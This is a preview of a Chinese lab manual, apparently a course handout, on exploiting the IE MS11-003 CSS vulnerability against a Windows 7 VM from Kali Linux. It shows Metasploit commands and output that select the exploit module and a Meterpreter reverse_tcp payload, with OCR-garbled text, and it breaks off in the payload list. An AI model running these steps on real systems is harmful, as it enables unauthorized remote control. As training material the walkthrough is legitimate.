工业互联网安全测试技术:系统测试.docx
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_1.gif)
![资源得分’ title=](/images/score_05.gif)
《工业互联网安全测试技术:系统测试.docx》由会员分享,可在线阅读,更多相关《工业互联网安全测试技术:系统测试.docx(6页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、系统2系统测试实验文档实验原理msll-003漏洞(Windows7IE溢出攻击)是利用IE浏览器中对css的解析存在一个问题, 导致任何访问包含非法css的页面将导致IE浏览器崩溃重启的漏,利用这个漏洞可以获取 Windows7计算机的控制台。实验目的通过kali linux里面集成的Metasploit渗透测试框架,利用msll-003漏洞,从而实现 对被入侵主机实施文件下载、控制命令窗口等攻击。实验环境Windows 7 系统Kali Linux 系统,推荐课时数:2课时实验步骤 首先翻开 kali 虚拟机和一台 windows? ie8,在 windows7查看 IP : 192,16
2、8.233,138, kali 查看 IP : C:Usersyanipconf igWindows IP 配置以太网适配器本地连接:珏道适配器 isatap. localdomainDNS后缀localdonain fe80:b80e:媒体已断开 localdonainAle Actions Edit View Help f(kalikali)-(-J J ifconfigethO: flagS-4163 mtu 1500 inet 192.168.233.130 netaask 255.255.255.0 broadcast 192.168.233.255 inet6 fe80 :20c:
3、29f f:fe42:4d6 prefixlen 64 scopeid 0x2O ether 00:0c:29:42:04:d6 txqueuelen 1000 (Ethernet) RX packets 174 bytes 19377 (18.9 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 23 bytes 2346 (2.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 010: HagS-73 mtu 65536 inet 127.0.0.1 ne
4、tmask 255.0.0.0 inet6 :1 prefixlen 128 scopeid 0lO loop txqueuelen 1000 (Local Loopback) RX packets 8 bytes 400 (400.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8 bytes 400 (400.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0图1 IP地址(2)在kali虚拟机中ping该虚拟机,查看是否可以ping通。L$ ping P
5、ING 192.168.233.149 (192.168.233.149) 56(84) bytes of data.64bytesfrom:icmp_seq=lttl=128time=0.926ms64bytesfrom:icmp_seq=2ttl=128time=0.420ms64bytesfrom:icmp_seq=3ttl=128time=0.871ms64bytesfrom:icmp_seq=4ttl=128time=0.353ms64bytesfrom:icmp_seq=5ttl=128time=0.369ms图 2 kali ping win7(3) Metasploit框架(简
6、称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序 语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模 板。该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模 块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为 总模块,其他均为分支模块。翻开msfconsole工具,命令行中输入search msll_003omsf6 search msll_003Matching Modules# Name iption# Name iptionDi
7、sclosure Date Rank Check Descr0 exploit/windows/browser/msll_003_ie_css_import 2010-11-29 good No MS11- 003 Microsoft Internet Explorer CSS Recursive Import Use After FreeInteract with a module by name or index. For example info 0, use 0 or use exploit/windows /browser/msll 003 ie css import图3查看msll
8、_003漏洞(4) 使用命令 use exploit/windows/browser/msll_003Je_css_importmsf6 use exploit/windows/browser/msll_003_ie_css_importNo payload configured, defaulting to windows/meterpreter/reverse_tcp图4使用msll_003漏洞(5) show payloads 选择 windows/meterpreter/reverse_tcpmsf6 exploit() show payloadsCompatible Payloads
9、# NameDisclosure Date RankCheck Description0payload/generic/customnormal NoCustom Payload1 payload/generic/debug_trapnormal NoGeneric x86 Debug Trap2 payload/generic/shell_bind_tcpnormal No Generic Command Shell, Bind TCP Inline3 payload/generic/shell_reverse_tcpnormal No Generic Command Shell, Reve
10、rse TCP Inline4 payload/generic/tight_loopnormal No Generic x86 Tight Loop5 payload/windows/dllinject/bind_hidden_ipknock_tcpnormal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager6 payload/windows/dllinject/bind_hidden_tcpnormal No Reflective DLL Injection, Hidden Bind TCP Stager7 payloa
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 工业 互联网 安全 测试 技术 系统
![提示](https://www.taowenge.com/images/bang_tan.gif)
限制150内